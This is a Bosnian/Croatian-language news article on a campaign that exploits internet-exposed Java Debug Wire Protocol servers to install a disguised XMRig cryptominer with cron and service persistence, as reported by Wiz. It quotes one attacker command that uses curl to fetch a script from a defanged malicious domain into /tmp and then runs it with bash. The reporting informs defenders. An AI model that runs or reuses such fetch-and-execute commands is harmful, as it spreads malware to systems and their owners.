U novom valu kibernetičkih napada, organizacije koje nehotice izlože Java Debug Wire Protocol (JDWP) servere internetu postaju meta. Napadači koriste ovu inače zanemarenu pristupnu tačku za širenje sofisticiranog zlonamjernog softvera za rudarenje kriptovaluta.
JDWP je standardna funkcija u Java platformi, dizajnirana da olakša daljinsko otklanjanje grešaka tako što omogućava programerima da pregledaju aplikacije u realnom vremenu.
Međutim, kada JDWP ostane dostupan na produkcijskim sistemima, često uslijed pogrešne konfiguracije ili korištenja razvojnih zastavica u radnim okruženjima, postaje snažan vektor za daljinsko izvršavanje koda.
Pojava ove prijetnje obilježena je brzim ciklusima eksploatacije. U nekoliko viđenih incidenata, napadači su uspjeli kompromitovati ranjive mašine u roku od nekoliko sati od izlaganja.
Tok napada obično počinje masovnim internet pretragama otvorenih JDWP portova, najčešće porta 5005. Nakon identifikacije mete, napadač inicira JDWP “rukovanje” kako bi potvrdio aktivnost usluge, a zatim uspostavlja sesiju, stječući interaktivni pristup Java Virtual Machine (JVM).
Ovaj pristup omogućava napadaču da nabroji učitane klase i pozove metode, što na kraju omogućava izvršavanje proizvoljnih naredbi na sistemu.
Analitičari kompanije Wiz identificirali su ovu kampanju nakon što su uočili pokušaje eksploatacije na svojim serverima sa “mednom zamkom” koji pokreću TeamCity, popularni CI/CD alat.
Napad je demonstrirao visok stepen automatizacije i prilagođavanja, uvođenjem modificiranog XMRig kripto rudara sa kodiranom konfiguracijom kako bi se izbjeglo otkrivanje.
Posebno, zlonamjerni softver je koristio proxy-e za rudarske bazene kako bi prikrio adresu novčanika odredišta, otežavajući napore da se nezakonita operacija rudarenja uđe u trag ili prekine.
Uticaj ovih napada je značajan. Zloupotrebom JDWP, akteri prijetnji mogu ne samo rasporediti kripto rudare, već i uspostaviti duboku perzistenciju, manipulirati sistemskim procesima i potencijalno se proširiti na druge resurse unutar kompromitovanog okruženja.
Prikupljanje informacija o ranjivostima JDWP i eksploatacija na njih je fokus ovih napada. Napadači koriste JDWP-ovu nesigurnost, tj. nedostatak autentičnosti, kako bi ubrizgali i izvršili direktne naredbe za šifrovanje putem protokola.
Nakon uspostavljanja komunikacije, uobičajeno preuzimaju skriptu za ubacivanje, kao što je logservice.sh, koristeći naredbe koje uključuju `curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh` te potom izvršavanje `bash /tmp/logservice.sh`.
Ova skripta je dizajnirana da ugasi konkurente rudare, preuzme zlonamjerni XMRig binarni kod prerušen kao logrotate i instalira ga u direktorijum sa konfiguracijom korisnika.
Zatim skripta postavlja višestruke mehanizme perzistencije, uključujući izmjenu datoteka za pokretanje ljuske, kreiranje cron poslova i instalaciju lažne sistemske usluge.
Ovaj lanac infekcije je efikasan i otporan, omogućavajući kripto rudaru da preživi ponovna pokretanja sistema i prijave korisnika.
Korištenje naziva procesa i sistemskih lokacija koji zvuče legitimno od strane napadača dodatno komplikuje napore za otkrivanje i sanaciju, naglašavajući potrebu za budnim upravljanjem konfiguracijom i snažnim nadzorom izloženih usluga.
